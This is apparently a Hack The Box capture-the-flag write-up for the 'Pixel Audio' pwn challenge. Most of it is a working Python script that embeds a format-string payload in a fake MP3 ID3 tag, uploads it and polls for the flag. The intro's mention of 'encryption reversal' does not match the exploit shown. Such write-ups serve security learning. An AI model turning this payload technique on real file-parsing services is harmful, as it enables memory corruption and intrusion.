Post

HackTheBox Pixel Audio Writeup

Posted
By x3ric
2 min read

Explore the basics of cybersecurity in the Pixel Audio Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/594

Description

Welcome to “Pixel Audio” – your ultimate destination for musical bliss! Embark on a journey of sonic delight as you immerse yourself in the tunes that resonate with your soul. Take a break from the hustle and bustle of life and unwind in our vibrant virtual realm. Whether you’re seeking energetic beats to uplift your spirits or soothing melodies to calm your mind, “Pixel Audio” has you covered. Step into our world, where every note is a pixel of joy, and every rhythm paints a picture of serenity. Join us at “Pixel Audio” and let the music carry you away on a euphoric adventure!

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

import requests
import time
import sys
import os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

def upload_file(url, file_path):
    """ Uploads a file to the server. """
    with open(file_path, 'rb') as file:
        files = {'file': ('test.mp3', file, 'audio/mp3')}
        response = requests.post(url, files=files)
    return response.status_code

def check_for_flag(url):
    """ Requests the /play endpoint to retrieve and display the flag. """
    while True:
        response = requests.get(url)
        if 'HTB' in response.text:
            print("Flag found:", response.text.strip())
            break
        else:
            print("No flag yet, retrying...")
        time.sleep(1)

def main():
    base_url = get_base_url()
    payload = 'ID3%48879c%12$n%495c%13$n'
    file_path = '/tmp/test.mp3'
    with open(file_path, 'wb') as f:
        f.write(payload.encode('utf-8'))
    print("Payload written to", file_path)
    upload_url = f'{base_url}/upload'
    play_url = f'{base_url}/play'
    print("Uploading payload...")
    if upload_file(upload_url, file_path) == 200:
        print("Payload uploaded successfully.")
        check_for_flag(play_url)
    else:
        print("Failed to upload payload.")

if __name__ == '__main__':
    main()

Summary

The Pixel Audio Challenge on Hack The Box is a medium-level challenge that introduces users to concepts like file manipulation, server communication, and exploiting vulnerabilities in file formats. In this challenge, participants reverse-engineer an audio parsing binary, craft a payload embedded in an MP3 file, and upload it to a server. The exploit manipulates the ID3 metadata to trigger a response from the server, ultimately revealing the flag. This challenge provides an excellent opportunity for those looking to gain hands-on experience with reversing, web vulnerabilities, and file-based exploitation techniques.

challenge
htb challenge writeup linux pwn
This post is licensed under CC BY 4.0 by the author.